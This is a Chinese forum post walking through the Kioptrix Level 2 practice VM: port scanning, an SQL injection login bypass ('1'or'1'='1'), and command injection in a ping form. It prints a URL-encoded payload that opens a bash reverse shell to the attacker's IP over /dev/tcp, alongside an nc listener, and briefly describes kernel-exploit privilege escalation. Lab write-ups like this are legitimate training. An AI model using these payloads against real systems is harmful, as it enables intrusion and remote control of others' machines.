Kioptrix-Level Two

打印 上一主题 下一主题

主题 872|帖子 872|积分 2616

确定攻击靶机


  • 老样子先确定攻击靶机,多了个数据库服务

    • 攻击机:192.168.38.128
    • 靶机:192.168.38.131


信息搜集

web服务80/443

页面信息


  • 为一个登录页面,尝试利用SQL注入1'or'1'='1就进去了存在Sql注入。不过页面貌前没发现什么东西。

  • 目录扫描到一个路径访问似乎是一个文档

  • 文档路径,不同语言内容类似,就是语言不一样

  • 获取网站指纹信息

  • nmap获取服务版本信息获取。

数据库服务|3306


  • 尝试连接提示没有开启连接,几乎无解

远程连接服务|22


  • 连接测试,提示无密钥交换方式需要后续去添加。

IPP(CUPS)|631


  • 可以通过web页面打开,不过没有任何东西就知道一个版本号码。属于网络打印服务

整理信息


  • 操作系统:Red Hat Linux
  • 内核版本:Linux 2.4.9
端口服务版本信息备注22/tcpsshOpenSSH 3.9p1 (protocol 1.99)交换方式需要添加80/tcphttpApache httpd 2.0.52 (CentOS) PHP4.3.9存在SQL注入111/tcprpcbind2 (RPC #100000)443/tcpssl/httpApache httpd 2.0.52 (CentOS) PHP4.3.9存在SQL注入631/tcpippCUPS 1.1打印服务3306/tcpmysqlMySQL (unauthorized)无法远程连接搜索攻击点

历史漏洞POC

SSH |  3.9p1


  • 有一个命令实验但是缺少相关服务,只有用户枚举服务。

Web| 80,443


  • 只有一个GET拒绝服务符合

CUPS|631


  • 除开第一个文件上传的,还有几个拒绝服务和本地提权可以利用

测试攻击

Web服务


  • 前段有个SQL注入归去看看吃了不细看的亏,没注意到他源代码错误的

  • 根据他表单提交的路径为pingit.php,传参为POST传参,传参点为submit表单按钮(必须),ip

    • 为什么必须要submit看HTML的类型为提交按钮,在前段需要按了提交按钮表单的内容才能被提交上去,全部是要必须带上的!!!,enctype为提交类型选择表单提交。


  • 可以ping那么就可能会存在REC远程代码实验

  • 大概确定了目标呆板上没有nc命令,只能通过bash将shell弹到攻击机上面
  1. #传参,&要经过Url编码变成%26,多个参数之间用的不要进行编码,如果不行就修复表单提交
  2. ip=127.0.0.1%26/bin/bash -i >%26 /dev/tcp/192.168.38.128/8888 0>&1&submit=submit
  3. #监听本地端口
  4. nc -lvvp 8888
复制代码


  • bash反弹到攻击机上面,先监听再EXECUTE

正常表现表单方法


  • 刷新登录后的页面,利用Burp Suite抓取请求包,右键拦截响应包后forward

  • 将响应包的那个多的点删掉后关掉拦截就可以了

提权


  • 可以看到当前的用户为apache用户,需要对当前用户权限进行提升,想了想之前看到的CUPS的提权漏洞可以试试

  • 不支持,缺少相关的情况架构(x86)不符合。

信息搜集


  • 查看系统的版本和内核确定有没有相关的漏洞

  • 查找相关版本漏洞

  • 查看版本和内核都符合要求

  • 传到靶机上面

  • 编译实验


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

知者何南

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表